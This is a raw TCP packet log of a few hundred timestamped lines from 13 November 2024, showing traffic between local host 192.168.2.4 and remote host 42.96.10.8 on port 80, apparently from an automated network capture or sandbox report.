                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416095972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416151047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416168928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416184902 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416203976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416240931 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416249037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416265011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416280031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416299105 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416317940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416344881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416366100 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416374922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416409016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416410923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416493893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416544914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416580915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416595936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416610956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416625977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416637897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416640997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416661978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416717052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416742086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416754961 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416757107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416798115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416815996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416831970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416857958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416873932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416887999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416889906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416912079 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416930914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.416961908 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417054892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417083025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417098999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417114973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417124033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417130947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417146921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417155981 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417164087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417191029 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417196035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417239904 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417248011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417263031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417314053 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417332888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417412043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417426109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417439938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417454958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417457104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417478085 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417598009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417612076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417638063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417638063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417655945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417671919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417678118 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417689085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417702913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417716026 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417718887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417732954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417742968 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417749882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417768002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417781115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417783022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417804956 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417867899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417885065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417900085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417911053 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417916059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.417944908 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.461482048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.461498022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.461513042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.461529970 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.461549044 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.462018013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.462033987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.462049961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.462064028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.462080002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.462091923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.462094069 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.462106943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.462121964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.462135077 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.462140083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.462146997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.462157965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.462171078 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.462199926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.517415047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.517563105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.517577887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.517611027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.531837940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.531892061 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.532001019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.532015085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.532030106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.532046080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.532063007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.532066107 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.532110929 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.532171011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.532185078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.532201052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.532228947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.532241106 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.532356024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.532370090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.532383919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.532401085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.532409906 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.532413960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.532454967 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.532788992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.532804966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.532819986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.532831907 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.532855034 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.532944918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.532959938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.532975912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.532989979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533000946 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533006907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533023119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533032894 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533060074 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533114910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533130884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533145905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533171892 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533276081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533288956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533303022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533317089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533334970 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533329964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533360958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533363104 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533363104 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533379078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533417940 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533530951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533545017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533560991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533576965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533582926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533591986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533627987 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533698082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533713102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533727884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533742905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533751965 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533759117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533767939 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533773899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533792973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533798933 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533837080 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533938885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533955097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533971071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.533986092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534008026 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534018993 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534112930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534128904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534146070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534168005 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534276962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534292936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534307957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534318924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534326077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534343958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534465075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534481049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534497023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534507036 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534512043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534528017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534539938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534544945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534559965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534568071 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534599066 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534624100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534638882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534653902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534677029 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534806967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534821987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534848928 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534980059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.534996033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.535012007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.535022974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.535036087 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.535039902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.535057068 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.535079002 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.535152912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.535167933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.535182953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.535198927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.535207987 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.535213947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.535238981 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.575999022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.576020002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.576036930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.576044083 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.576081038 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.576596975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.576644897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.576659918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.576683998 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.576702118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.576715946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.576740026 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.576741934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.576765060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.576781988 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.576790094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.576807022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.576821089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.576831102 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.576838017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.576858997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.576884985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.576900005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.576924086 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.618065119 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.630559921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.630580902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.630601883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.630619049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.646563053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.646580935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.646596909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.646605015 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.646614075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.646629095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.646635056 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.646647930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.646665096 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.646708012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.646745920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.646765947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.646781921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.646822929 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.646827936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.646841049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.646878004 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.646924019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.646936893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.646975040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647135973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647164106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647180080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647207975 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647238016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647253990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647268057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647277117 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647303104 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647342920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647378922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647396088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647418022 CET4973380192.168.2.442.96.10.8
